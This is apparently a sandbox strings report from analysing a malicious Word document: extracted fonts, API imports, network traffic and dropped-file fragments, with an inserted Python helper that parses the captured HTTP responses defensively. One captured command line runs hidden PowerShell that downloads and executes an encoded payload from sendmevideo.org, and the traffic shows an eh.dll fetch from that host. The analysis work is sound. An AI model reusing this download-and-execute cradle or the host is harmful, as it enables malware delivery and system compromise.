Ansi based on Image Processing (screen_6.png)
_l.8_0.ll_
Ansi based on Image Processing (screen_3.png)
_l__'_l_
Ansi based on Image Processing (screen_3.png)
_m_m,,,
Ansi based on Image Processing (screen_0.png)
_nnat
Ansi based on Image Processing (screen_3.png)
_pAyLoAD
Ansi based on Image Processing (screen_0.png)
`.rdata
Ansi based on Dropped File (carved_0.dll.1509628513544)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (WINWORD.EXE )
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data (WINWORD.EXE )
AaBbc(
Ansi based on Image Processing (screen_6.png)
AaebccD(
Ansi based on Image Processing (screen_6.png)
ab_in
Ansi based on Image Processing (screen_3.png)
ADVAPI32.dll
Ansi based on PCAP Processing (network.pcap)
again
Ansi based on Image Processing (screen_3.png)
Agency FB
Unicode based on Runtime Data (WINWORD.EXE )
AgentAnim
Unicode based on Runtime Data (WINWORD.EXE )
aH$in
Ansi based on Dropped File (carved_0.dll.1509628513544)
Aharoni
Unicode based on Runtime Data (WINWORD.EXE )
Algerian
Unicode based on Runtime Data (WINWORD.EXE )
Andalus
Unicode based on Runtime Data (WINWORD.EXE )
android.clients.google.com
Ansi based on PCAP Processing (network.pcap)
android.com
Ansi based on PCAP Processing (network.pcap)
Angsana New
Unicode based on Runtime Data (WINWORD.EXE )
AngsanaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Aparajita
Unicode based on Runtime Data (WINWORD.EXE )
Arabic Typesetting
Unicode based on Runtime Data (WINWORD.EXE )
Arial
Unicode based on Runtime Data (WINWORD.EXE )
Arial Black
Unicode based on Runtime Data (WINWORD.EXE )
Arial Narrow
Unicode based on Runtime Data (WINWORD.EXE )
Arial Rounded MT Bold
Unicode based on Runtime Data (WINWORD.EXE )
Arial Unicode MS
Unicode based on Runtime Data (WINWORD.EXE )
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
Ansi based on PCAP Processing (network.pcap)
ation
Unicode based on Dropped File (carved_0.dll.1509628513544)
authroot.stl
Ansi based on PCAP Processing (network.pcap)
AutoConfigURL
Unicode based on Runtime Data (rundll32.exe )
AutoDetect
Unicode based on Runtime Data (WINWORD.EXE )
aV!uRQyxX'h
Ansi based on PCAP Processing (network.pcap)
Baskerville Old Face
Unicode based on Runtime Data (WINWORD.EXE )
Batang
Unicode based on Runtime Data (WINWORD.EXE )
BatangChe
Unicode based on Runtime Data (WINWORD.EXE )
Bauhaus 93
Unicode based on Runtime Data (WINWORD.EXE )
BB0744FB
Unicode based on Runtime Data (WINWORD.EXE )
Bell MT
Unicode based on Runtime Data (WINWORD.EXE )
Berlin Sans FB
Unicode based on Runtime Data (WINWORD.EXE )
Berlin Sans FB Demi
Unicode based on Runtime Data (WINWORD.EXE )
Bernard MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Blackadder ITC
Unicode based on Runtime Data (WINWORD.EXE )
Bn9h{<my-'=ZFUjpTAJ?QX
Ansi based on Dropped File (~WRD0000.tmp)
Bodoni MT
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Black
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Bodoni MT Poster Compressed
Unicode based on Runtime Data (WINWORD.EXE )
Book Antiqua
Unicode based on Runtime Data (WINWORD.EXE )
Bookman Old Style
Unicode based on Runtime Data (WINWORD.EXE )
Bookshelf Symbol 7
Unicode based on Runtime Data (WINWORD.EXE )
Bradley Hand ITC
Unicode based on Runtime Data (WINWORD.EXE )
Britannic Bold
Unicode based on Runtime Data (WINWORD.EXE )
Broadway
Unicode based on Runtime Data (WINWORD.EXE )
Browallia New
Unicode based on Runtime Data (WINWORD.EXE )
BrowalliaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Brush Script MT
Unicode based on Runtime Data (WINWORD.EXE )
bTc+28aBU64."=*+;?GNHA7K<]P;~T<x4:=GqJ.,NdTQ}<G37p,Mda03IIt$nXrgG$iXYPI%I?c5.RWlpBb5T!u7+U Kghj~5(QV
Ansi based on Dropped File (~WRD0000.tmp)
c9o:m
Ansi based on Dropped File (carved_0.dll.1509628513544)
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://sendmevideo.org/dh2025e/eee.txt');powershell -enc $e # .EXE a
Ansi based on Process Commandline (powershell.exe)
C:_r_ramsmi_a_A_m_mSWard.ex
Ansi based on Image Processing (screen_3.png)
c==/6g b&*+Qb]bw*N3#_tgK}BVQ~>\'!`"7/e}x ]\+`J)nGOt:_NIW2^cU'd%#[){?PK!EOMword/fontTable.xmlj0K{2uJ6>XF7o f~f>kQU/%INU>~xVV+d`CY+m'i)M\LYPVwpv/q}wK3[3YlFVqdcG`/k(|jbg]tFNN8c(LEY-r8i68VPqNd\B@lQ=44@78Ug-^fVrlj|`c'
Ansi based on Dropped File (~WRD0000.tmp)
California1
Ansi based on PCAP Processing (network.pcap)
Californian FB
Unicode based on Runtime Data (WINWORD.EXE )
Calisto MT
Unicode based on Runtime Data (WINWORD.EXE )
Cambria Math
Unicode based on Runtime Data (WINWORD.EXE )
Candara
Unicode based on Runtime Data (WINWORD.EXE )
Castellar
Unicode based on Runtime Data (WINWORD.EXE )
Centaur
Unicode based on Runtime Data (WINWORD.EXE )
Century
Unicode based on Runtime Data (WINWORD.EXE )
Century Gothic
Unicode based on Runtime Data (WINWORD.EXE )
Century Schoolbook
Unicode based on Runtime Data (WINWORD.EXE )
cfootprint
Ansi based on PCAP Processing (network.pcap)
change
Ansi based on Image Processing (screen_3.png)
Chiller
Unicode based on Runtime Data (WINWORD.EXE )
Clipbaard
Ansi based on Image Processing (screen_6.png)
CloseHandle
Ansi based on PCAP Processing (network.pcap)
Colonna MT
Unicode based on Runtime Data (WINWORD.EXE )
Comic Sans MS
Unicode based on Runtime Data (WINWORD.EXE )
CompanyName
Unicode based on Dropped File (carved_0.dll.1509628513544)
Consolas
Unicode based on Runtime Data (WINWORD.EXE )
Constantia
Unicode based on Runtime Data (WINWORD.EXE )
Cooper Black
Unicode based on Runtime Data (WINWORD.EXE )
Copperplate Gothic Bold
Unicode based on Runtime Data (WINWORD.EXE )
Copperplate Gothic Light
Unicode based on Runtime Data (WINWORD.EXE )
Corbel
Unicode based on Runtime Data (WINWORD.EXE )
Cordia New
Unicode based on Runtime Data (WINWORD.EXE )
CordiaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Courier New
Unicode based on Runtime Data (WINWORD.EXE )
CreateDirectoryW
Ansi based on PCAP Processing (network.pcap)
CreateFileMappingA
Ansi based on PCAP Processing (network.pcap)
CreateFileW
Ansi based on PCAP Processing (network.pcap)
CreateMutexA
Ansi based on PCAP Processing (network.pcap)
CreateRemoteThread
Ansi based on PCAP Processing (network.pcap)
CreateThread
Ansi based on PCAP Processing (network.pcap)
CreateToolhelp32Snapshot
Ansi based on PCAP Processing (network.pcap)
CRYPT32.dll
Ansi based on PCAP Processing (network.pcap)
CryptBinaryToStringA
Ansi based on PCAP Processing (network.pcap)
CryptStringToBinaryA
Ansi based on PCAP Processing (network.pcap)
CryptSvc
Unicode based on Runtime Data (rundll32.exe )
cryptsvc
Unicode based on Runtime Data (rundll32.exe )
Curlz MT
Unicode based on Runtime Data (WINWORD.EXE )
d%HT`r-S8d%w=d[Zh-BFU4n~]:_z0vRwq!<dqGvvrk
Ansi based on Dropped File (~WRD0000.tmp)
D;%4L<#laPR:
Ansi based on PCAP Processing (network.pcap)
DaunPenh
Unicode based on Runtime Data (WINWORD.EXE )
David
Unicode based on Runtime Data (WINWORD.EXE )
DefaultConnectionSettings
Unicode based on Runtime Data (rundll32.exe )
DeleteFileW
Ansi based on PCAP Processing (network.pcap)
developer.android.google.cn
Ansi based on PCAP Processing (network.pcap)
developers.android.google.cn
Ansi based on PCAP Processing (network.pcap)
DFKai-SB
Unicode based on Runtime Data (WINWORD.EXE )
DGMNOEP
Ansi based on Dropped File (carved_0.dll.1509628513544)
DilleniaUPC
Unicode based on Runtime Data (WINWORD.EXE )
DisableThreadLibraryCalls
Ansi based on PCAP Processing (network.pcap)
DispatchMessageA
Ansi based on PCAP Processing (network.pcap)
dO3x\BoX
Ansi based on PCAP Processing (network.pcap)
DokChampa
Unicode based on Runtime Data (WINWORD.EXE )
Dotum
Unicode based on Runtime Data (WINWORD.EXE )
DotumChe
Unicode based on Runtime Data (WINWORD.EXE )
downloadwindowsupdate
Ansi based on PCAP Processing (network.pcap)
DZf|V.SR'H&.5SXS5tH.KbDytNH/9(12{g%?
Ansi based on Dropped File (~WRD0000.tmp)
e9:(H$.7E
Ansi based on PCAP Processing (network.pcap)
e?OQ&B/v
Ansi based on Dropped File (carved_0.dll.1509628513544)
e_e'_
Ansi based on Image Processing (screen_6.png)
Ebrima
Unicode based on Runtime Data (WINWORD.EXE )
Edwardian Script ITC
Unicode based on Runtime Data (WINWORD.EXE )
Elephant
Unicode based on Runtime Data (WINWORD.EXE )
en-US
Unicode based on Runtime Data (rundll32.exe )
Engravers MT
Unicode based on Runtime Data (WINWORD.EXE )
Equifax1-0+
Ansi based on PCAP Processing (network.pcap)
Eras Bold ITC
Unicode based on Runtime Data (WINWORD.EXE )
Eras Demi ITC
Unicode based on Runtime Data (WINWORD.EXE )
Eras Light ITC
Unicode based on Runtime Data (WINWORD.EXE )
Eras Medium ITC
Unicode based on Runtime Data (WINWORD.EXE )
Estrangelo Edessa
Unicode based on Runtime Data (WINWORD.EXE )
EucrosiaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Euphemia
Unicode based on Runtime Data (WINWORD.EXE )
eWZgpFj&
Ansi based on PCAP Processing (network.pcap)
E{j3OMWrk
Ansi based on PCAP Processing (network.pcap)
FangSong
Unicode based on Runtime Data (WINWORD.EXE )
fao.b*lIrj),l0%b
Ansi based on Dropped File (~WRD0000.tmp)
fC7:`FiHP=n) 0mT5
Ansi based on PCAP Processing (network.pcap)
Felix Titling
Unicode based on Runtime Data (WINWORD.EXE )
FileDescription
Unicode based on Dropped File (carved_0.dll.1509628513544)
FileVersion
Unicode based on Dropped File (carved_0.dll.1509628513544)
Footlight MT Light
Unicode based on Runtime Data (WINWORD.EXE )
FOrmatPaintir
Ansi based on Image Processing (screen_3.png)
Forte
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Book
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Demi
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Demi Cond
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Heavy
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Medium
Unicode based on Runtime Data (WINWORD.EXE )
Franklin Gothic Medium Cond
Unicode based on Runtime Data (WINWORD.EXE )
FrankRuehl
Unicode based on Runtime Data (WINWORD.EXE )
FreeLibrary
Ansi based on PCAP Processing (network.pcap)
FreesiaUPC
Unicode based on Runtime Data (WINWORD.EXE )
Freestyle Script
Unicode based on Runtime Data (WINWORD.EXE )
French Script MT
Unicode based on Runtime Data (WINWORD.EXE )
Ft#6"w9:0t[E[?N1~piMPir1/C4^C,_R&+Hd\CBwPV*h"|x0gV5iy$4V"e9BA)jT(y>vwv(SLqWUDXQw4S^0F"\gsldYdLuHc9>(hVD5{A7tPK!N_rels/.rels (JAa}7
Ansi based on Dropped File (~WRD0000.tmp)
fydGdxRicheGdx
Ansi based on PCAP Processing (network.pcap)
g$mg49z'c'Yy&h-]IB[nxG!!i[1dsjT"5U$Z,K_M-sdC""h`#BE=x56f}P^Hjl9*T`<Oy`#@P~x2d$6dy%t@`'ut|+{{W>d7\iIv
Ansi based on Dropped File (~WRD0000.tmp)
g/ox(-R,vj,'I8M8M#8M
Ansi based on Dropped File (~WRD0000.tmp)
G_)Ew_9_8]ROu!}=I]?re
Ansi based on Dropped File (~WRD0000.tmp)
g_u__xx_,r_\_6
Ansi based on Image Processing (screen_6.png)
Gabriola
Unicode based on Runtime Data (WINWORD.EXE )
Garamond
Unicode based on Runtime Data (WINWORD.EXE )
Gautami
Unicode based on Runtime Data (WINWORD.EXE )
GdipAlloc
Ansi based on PCAP Processing (network.pcap)
GdipCloneImage
Ansi based on PCAP Processing (network.pcap)
GdipCreateBitmapFromHBITMAP
Ansi based on PCAP Processing (network.pcap)
GdipDisposeImage
Ansi based on PCAP Processing (network.pcap)
GdipFree
Ansi based on Dropped File (carved_0.dll.1509628513544)
GdipGetImageEncoders
Ansi based on PCAP Processing (network.pcap)
GdipGetImageEncodersSize
Ansi based on PCAP Processing (network.pcap)
gdiplus.dll
Ansi based on PCAP Processing (network.pcap)
GdiplusShutdown
Ansi based on PCAP Processing (network.pcap)
GdiplusStartup
Ansi based on PCAP Processing (network.pcap)
GdipSaveImageToStream
Ansi based on PCAP Processing (network.pcap)
Georgia
Unicode based on Runtime Data (WINWORD.EXE )
GeoTrust Global CA0
Ansi based on PCAP Processing (network.pcap)
GeoTrust Inc.1
Ansi based on PCAP Processing (network.pcap)
GET /dh2025e/eee.txt HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive
Ansi based on PCAP Processing (network.pcap)
GET /dh2025e/eh.dll HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive!
Ansi based on PCAP Processing (network.pcap)
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1Cache-Control: max-age = 86405Connection: Keep-AliveAccept: */*If-Modified-Since: Sat, 12 Nov 2016 01:34:12 GMTIf-None-Match: "02e4de843cd21:0"User-Agent: Microsoft-CryptoAPI/6.1Host: www.download.windowsupdate.com0
Ansi based on PCAP Processing (network.pcap)
GetAdaptersAddresses
Ansi based on PCAP Processing (network.pcap)
GetCurrentProcess
Ansi based on PCAP Processing (network.pcap)
GetExitCodeP!
Ansi based on PCAP Processing (network.pcap)
GetExitCodeProcess
Ansi based on Dropped File (carved_0.dll.1509628513544)
GetExitCodeThread
Ansi based on PCAP Processing (network.pcap)
GetFileSize
Ansi based on PCAP Processing (network.pcap)
GetLastError
Ansi based on PCAP Processing (network.pcap)
GetMessageA
Ansi based on PCAP Processing (network.pcap)
GetModuleHandleA
Ansi based on PCAP Processing (network.pcap)
GetPrivateProfileStringW
Ansi based on PCAP Processing (network.pcap)
GetProcAddress
Ansi based on PCAP Processing (network.pcap)
GetProcessHeap
Ansi based on PCAP Processing (network.pcap)
GetSystemInfo
Ansi based on PCAP Processing (network.pcap)
GetSystemMetrics
Ansi based on PCAP Processing (network.pcap)
GetSystemTimeAsFileTime
Ansi based on PCAP Processing (network.pcap)
GetTickCount
Ansi based on PCAP Processing (network.pcap)
GetVersionExA
Ansi based on PCAP Processing (network.pcap)
GetVolumeInformationW
Ansi based on PCAP Processing (network.pcap)
gI$vV~ST
Ansi based on PCAP Processing (network.pcap)
Gill Sans MT
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans MT Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans MT Ext Condensed Bold
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans Ultra Bold
Unicode based on Runtime Data (WINWORD.EXE )
Gill Sans Ultra Bold Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Gino/<<1A$>"f3\TISWY
Ansi based on Dropped File (~WRD0000.tmp)
Gisha
Unicode based on Runtime Data (WINWORD.EXE )
Gloucester MT Extra Condensed
Unicode based on Runtime Data (WINWORD.EXE )
Google Inc1
Ansi based on PCAP Processing (network.pcap)
Google Inc1%0#
Ansi based on PCAP Processing (network.pcap)
Google Internet Authority G20
Ansi based on PCAP Processing (network.pcap)
google-analytics.com
Ansi based on PCAP Processing (network.pcap)
google.com
Ansi based on PCAP Processing (network.pcap)
googlecommerce.com
Ansi based on PCAP Processing (network.pcap)
Goudy Old Style
Unicode based on Runtime Data (WINWORD.EXE )
Goudy Stout
Unicode based on Runtime Data (WINWORD.EXE )
gpsvc
Unicode based on Runtime Data (rundll32.exe )
Gulim
Unicode based on Runtime Data (WINWORD.EXE )
GulimChe
Unicode based on Runtime Data (WINWORD.EXE )
Gungsuh
Unicode based on Runtime Data (WINWORD.EXE )
GungsuhChe
Unicode based on Runtime Data (WINWORD.EXE )
h%IX`/*CQGw@(
Ansi based on Dropped File (~WRD0000.tmp)
h8:Bw^y5,X1Nh0`}y[eym/JDr8M)K-2}u>>uSj:7"Ff9b]sXvT)@6zKjRz}O\
Ansi based on Dropped File (~WRD0000.tmp)
h['!#EeF+Y-FWmfDPjMZ/}o"X-]=GUMEUoDD74x#@74\!7EUF+?XPU 6+fT=m#7BNPSrvP*R`#8#8#p'YV"UPaxUA!')
Ansi based on Dropped File (~WRD0000.tmp)
h_ailing_
Ansi based on Image Processing (screen_3.png)
Haettenschweiler
Unicode based on Runtime Data (WINWORD.EXE )
hangg
Ansi based on Image Processing (screen_6.png)
Harlow Solid Italic
Unicode based on Runtime Data (WINWORD.EXE )
Harrington
Unicode based on Runtime Data (WINWORD.EXE )
HeapAlloc
Ansi based on PCAP Processing (network.pcap)
HeapFree
Ansi based on Dropped File (carved_0.dll.1509628513544)
HeapReAlloc
Ansi based on PCAP Processing (network.pcap)
Hgad._nLHgad._n_
Ansi based on Image Processing (screen_6.png)
High Tower Text
Unicode based on Runtime Data (WINWORD.EXE )
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 11:35:21 GMTContent-Type: application/vnd.ms-cab-compressedContent-Length: 53978Connection: keep-aliveCache-Control: max-age=604800ETag: "014e8acee33d31:0"Expires: Tue, 07 Nov 2017 11:35:20 GMTLast-Modified: Fri, 22 Sep 2017 22:03:52 GMTServer: Microsoft-IIS/8.5MSRegion: EMEAx-ccc: FRx-cid: 3X-Powered-By: ASP.NETAge: 5687Accept-Ranges: bytesMSCF
Ansi based on PCAP Processing (network.pcap)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:40 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 12:13:53 GMTETag: "7f0-55cd6b0447ebb"Accept-Ranges: bytesContent-Length: 2032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plain; charset=UTF-…
Ansi based on PCAP Processing (network.pcap)
HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:46 GMTServer: Apache/2.4.6 (CentOS)Last-Modified: Tue, 31 Oct 2017 13:16:40 GMTETag: "7e00-55cd790d0d6eb"Accept-Ranges: bytesContent-Length: 32256Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamMZ
Ansi based on PCAP Processing (network.pcap)
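The three HTTP/1.1 200 responses above appear as one string each because the sandbox's string extractor drops CR/LF; the first printable bytes of the body (MSCF for a cabinet, MZ for a PE image) are glued onto the last header value. The Python below is an added example, not part of the sandbox report or of the sample: it splits such a string back into headers using the header names that actually occur in these dumps, recovers the body magic, and flags an executable body delivered under a generic Content-Type. The sample input is copied from the strings above; the text/plain response is kept cut off at "charset=UTF-" exactly as the dump shows it.

```python
import re

# The sandbox's string extractor drops CR/LF, so each response header block
# arrives as one run-together string, and the first printable bytes of the
# body (MSCF for a cabinet, MZ for a PE) are glued onto the last header value.
# These three are copied from the dump above; the second one is cut off in the
# dump after "charset=UTF-" and is kept that way here.
RESP_CAB = (
    'HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 11:35:21 GMTContent-Type: application/vnd.ms-cab-compressed'
    'Content-Length: 53978Connection: keep-aliveCache-Control: max-age=604800ETag: "014e8acee33d31:0"'
    'Expires: Tue, 07 Nov 2017 11:35:20 GMTLast-Modified: Fri, 22 Sep 2017 22:03:52 GMT'
    'Server: Microsoft-IIS/8.5MSRegion: EMEAx-ccc: FRx-cid: 3X-Powered-By: ASP.NETAge: 5687'
    'Accept-Ranges: bytesMSCF'
)
RESP_TXT = (
    'HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:40 GMTServer: Apache/2.4.6 (CentOS)'
    'Last-Modified: Tue, 31 Oct 2017 12:13:53 GMTETag: "7f0-55cd6b0447ebb"Accept-Ranges: bytes'
    'Content-Length: 2032Keep-Alive: timeout=5, max=100Connection: Keep-Alive'
    'Content-Type: text/plain; charset=UTF-'
)
RESP_DLL = (
    'HTTP/1.1 200 OKDate: Thu, 02 Nov 2017 13:09:46 GMTServer: Apache/2.4.6 (CentOS)'
    'Last-Modified: Tue, 31 Oct 2017 13:16:40 GMTETag: "7e00-55cd790d0d6eb"Accept-Ranges: bytes'
    'Content-Length: 32256Keep-Alive: timeout=5, max=100Connection: Keep-Alive'
    'Content-Type: application/octet-streamMZ'
)

# With the line breaks gone, the only safe way to find header boundaries is a
# closed list of header names; anything not listed stays part of the previous value.
HEADER_NAMES = ["Date", "Server", "Content-Type", "Content-Length", "Connection",
                "Cache-Control", "ETag", "Expires", "Last-Modified", "MSRegion",
                "x-ccc", "x-cid", "X-Powered-By", "Age", "Accept-Ranges", "Keep-Alive"]
_NAME_RE = re.compile("(" + "|".join(re.escape(n) for n in HEADER_NAMES) + "): ")

BODY_MAGIC = {"MSCF": "Microsoft cabinet", "MZ": "PE executable"}  # longest first
EXPECTED_TYPES = {
    "Microsoft cabinet": {"application/vnd.ms-cab-compressed"},
    "PE executable": {"application/x-msdownload", "application/x-dosexec",
                      "application/vnd.microsoft.portable-executable"},
}


def parse_dumped_response(s):
    """Split a run-together response string into status line, headers, the
    body magic glued onto the last header, and a list of findings."""
    matches = list(_NAME_RE.finditer(s))
    if not matches:
        raise ValueError("no recognised header names in string")
    status = s[:matches[0].start()]
    headers = {}
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(s)
        headers[m.group(1)] = s[m.end():end]
    # Whatever follows the last header value is the start of the body.
    last = matches[-1].group(1)
    body_magic = None
    for magic, kind in BODY_MAGIC.items():
        if headers[last].endswith(magic):
            headers[last] = headers[last][:-len(magic)]
            body_magic = kind
            break
    length = headers.get("Content-Length", "")
    content_length = int(length) if length.isdigit() else None
    findings = []
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if body_magic and ctype not in EXPECTED_TYPES[body_magic]:
        findings.append(f"{body_magic} body delivered as {ctype or 'no Content-Type'}")
    return {"status": status, "headers": headers, "content_length": content_length,
            "body_magic": body_magic, "findings": findings}
```

Run over the three strings, only the 32256-byte response is flagged: a PE image served as application/octet-stream from an Apache/CentOS host, which is the download worth hashing and blocking. The cabinet response carries Microsoft-IIS and MSRegion/x-ccc headers consistent with Microsoft download infrastructure and its declared type matches its magic, so it is not flagged; the magic check is only as good as the string extractor, which stops at the first non-printable byte, so a body that starts with a non-printable byte leaves no magic behind.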
http://clients1.google.com/ocsp0
Ansi based on PCAP Processing (network.pcap)
http://g.symcd.com0
Ansi based on PCAP Processing (network.pcap)
http://pki.google.com/GIAG2.crl0
Ansi based on PCAP Processing (network.pcap)
http://pki.google.com/GIAG2.crt0+
Ansi based on PCAP Processing (network.pcap)
HttpOpenRequestA
Ansi based on PCAP Processing (network.pcap)
HttpQueryInfoA
Ansi based on PCAP Processing (network.pcap)
HttpSendRequestA
Ansi based on PCAP Processing (network.pcap)
HVPxH
Ansi based on Dropped File (carved_0.dll.1509628513544)
i../*,5zXz+ /0,TE^tw7fYEsKwH:EaO||ewV)QKQHzpd#p]y"j^}>)0d^Vwuo?fa>[U`(U}}I+
Ansi based on Dropped File (~WRD0000.tmp)
IETldDllVersionHigh
Unicode based on Runtime Data (rundll32.exe )
IETldDllVersionLow
Unicode based on Runtime Data (rundll32.exe )
IETldVersionHigh
Unicode based on Runtime Data (rundll32.exe )
IETldVersionLow
Unicode based on Runtime Data (rundll32.exe )
if NOT exist %inst_pck % (exit)
Ansi based on Dropped File (mvdrt.bat)
ig@X6_]7~
Ansi based on Dropped File (~WRD0000.tmp)
iginalFilename
Unicode based on Dropped File (carved_0.dll.1509628513544)
iK"4PLp<9SZ|c
Ansi based on PCAP Processing (network.pcap)
image/jpeg
Unicode based on Dropped File (carved_0.dll.1509628513544)
Impact
Unicode based on Runtime Data (WINWORD.EXE )
Imprint MT Shadow
Unicode based on Runtime Data (WINWORD.EXE )
In_ek
Ansi based on Image Processing (screen_3.png)
In_ik
Ansi based on Image Processing (screen_6.png)
in_rnet_nne_an,
Ansi based on Image Processing (screen_3.png)
Informal Roman
Unicode based on Runtime Data (WINWORD.EXE )
InternalName
Unicode based on Dropped File (carved_0.dll.1509628513544)
InternetCloseHandle
Ansi based on PCAP Processing (network.pcap)
InternetConnectA
Ansi based on PCAP Processing (network.pcap)
InternetOpenA
Ansi based on PCAP Processing (network.pcap)
InternetQueryOptionA
Ansi based on PCAP Processing (network.pcap)
InternetReadFile
Ansi based on PCAP Processing (network.pcap)
InternetSetOptionA
Ansi based on PCAP Processing (network.pcap)
IntranetName
Unicode based on Runtime Data (WINWORD.EXE )
IPHLPAPI.DLL
Ansi based on PCAP Processing (network.pcap)
IrisUPC
Unicode based on Runtime Data (WINWORD.EXE )
Iskoola Pota
Unicode based on Runtime Data (WINWORD.EXE )
IsWow64Process
Ansi based on PCAP Processing (network.pcap)
iT&F~J~NV f<
Ansi based on PCAP Processing (network.pcap)
Item 1
Unicode based on Runtime Data (WINWORD.EXE )
Item 10
Unicode based on Runtime Data (WINWORD.EXE )
Item 11
Unicode based on Runtime Data (WINWORD.EXE )
Item 12
Unicode based on Runtime Data (WINWORD.EXE )
Item 13
Unicode based on Runtime Data (WINWORD.EXE )
Item 14
Unicode based on Runtime Data (WINWORD.EXE )
Item 15
Unicode based on Runtime Data (WINWORD.EXE )
Item 16
Unicode based on Runtime Data (WINWORD.EXE )
Item 17
Unicode based on Runtime Data (WINWORD.EXE )
Item 18
Unicode based on Runtime Data (WINWORD.EXE )
Item 19
Unicode based on Runtime Data (WINWORD.EXE )
Item 2
Unicode based on Runtime Data (WINWORD.EXE )
Item 20
Unicode based on Runtime Data (WINWORD.EXE )
Item 21
Unicode based on Runtime Data (WINWORD.EXE )
Item 22
Unicode based on Runtime Data (WINWORD.EXE )
Item 23
Unicode based on Runtime Data (WINWORD.EXE )
Item 24
Unicode based on Runtime Data (WINWORD.EXE )
Item 25
Unicode based on Runtime Data (WINWORD.EXE )
Item 26
Unicode based on Runtime Data (WINWORD.EXE )
Item 27
Unicode based on Runtime Data (WINWORD.EXE )
Item 28
Unicode based on Runtime Data (WINWORD.EXE )
Item 29
Unicode based on Runtime Data (WINWORD.EXE )
Item 3
Unicode based on Runtime Data (WINWORD.EXE )
Item 30
Unicode based on Runtime Data (WINWORD.EXE )
Item 31
Unicode based on Runtime Data (WINWORD.EXE )
Item 32
Unicode based on Runtime Data (WINWORD.EXE )
Item 33
Unicode based on Runtime Data (WINWORD.EXE )
Item 34
Unicode based on Runtime Data (WINWORD.EXE )
Item 35
Unicode based on Runtime Data (WINWORD.EXE )
Item 36
Unicode based on Runtime Data (WINWORD.EXE )
Item 37
Unicode based on Runtime Data (WINWORD.EXE )
Item 38
Unicode based on Runtime Data (WINWORD.EXE )
Item 39
Unicode based on Runtime Data (WINWORD.EXE )
Item 4
Unicode based on Runtime Data (WINWORD.EXE )
Item 40
Unicode based on Runtime Data (WINWORD.EXE )
Item 41
Unicode based on Runtime Data (WINWORD.EXE )
Item 42
Unicode based on Runtime Data (WINWORD.EXE )
Item 43
Unicode based on Runtime Data (WINWORD.EXE )
Item 44
Unicode based on Runtime Data (WINWORD.EXE )
Item 45
Unicode based on Runtime Data (WINWORD.EXE )
Item 46
Unicode based on Runtime Data (WINWORD.EXE )
Item 47
Unicode based on Runtime Data (WINWORD.EXE )
Item 48
Unicode based on Runtime Data (WINWORD.EXE )
Item 49
Unicode based on Runtime Data (WINWORD.EXE )
Item 5
Unicode based on Runtime Data (WINWORD.EXE )
Item 50
Unicode based on Runtime Data (WINWORD.EXE )
Item 6
Unicode based on Runtime Data (WINWORD.EXE )
Item 7
Unicode based on Runtime Data (WINWORD.EXE )
Item 8
Unicode based on Runtime Data (WINWORD.EXE )
Item 9
Unicode based on Runtime Data (WINWORD.EXE )
iv_RiplaCiP
Ansi based on Image Processing (screen_6.png)
j Xj%^j2Z
Ansi based on PCAP Processing (network.pcap)
j%^j Xj2Z
Ansi based on PCAP Processing (network.pcap)
J(6-!FnBPFb2y(R1"I2OxfT#L
Ansi based on Dropped File (~WRD0000.tmp)
j.dR?(QxP3'J5$4v~^W=)~-}"!E?~BT5+
Ansi based on Dropped File (~WRD0000.tmp)
j.k#g,yw}*B.KO*/bUg+LO}/,zp 3j@@8*thox9cxpaA3j.p'M18nt}ynTT<91E#z[4E#Gz[4RE#z[4pv
Ansi based on Dropped File (~WRD0000.tmp)
JasmineUPC
Unicode based on Runtime Data (WINWORD.EXE )
JmoLzc<qhcN2zoa9+T-f6:Gbn~JqT[w<,97zNHs
Ansi based on Dropped File (~WRD0000.tmp)
Jokerman
Unicode based on Runtime Data (WINWORD.EXE )
jPYjrXjof
Ansi based on PCAP Processing (network.pcap)
Juice ITC
Unicode based on Runtime Data (WINWORD.EXE )
Jv_uPK!Nword/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^
Ansi based on Dropped File (~WRD0000.tmp)
jw@cO9h!m
Ansi based on PCAP Processing (network.pcap)
K@Nm}/k
Ansi based on Dropped File (~WRD0000.tmp)
KaiTi
Unicode based on Runtime Data (WINWORD.EXE )
Kalinga
Unicode based on Runtime Data (WINWORD.EXE )
Kartika
Unicode based on Runtime Data (WINWORD.EXE )
KERNEL32.dll
Ansi based on PCAP Processing (network.pcap)
Khmer UI
Unicode based on Runtime Data (WINWORD.EXE )
KIv%[Yz)kY
Ansi based on PCAP Processing (network.pcap)
KJ*jQL|N]
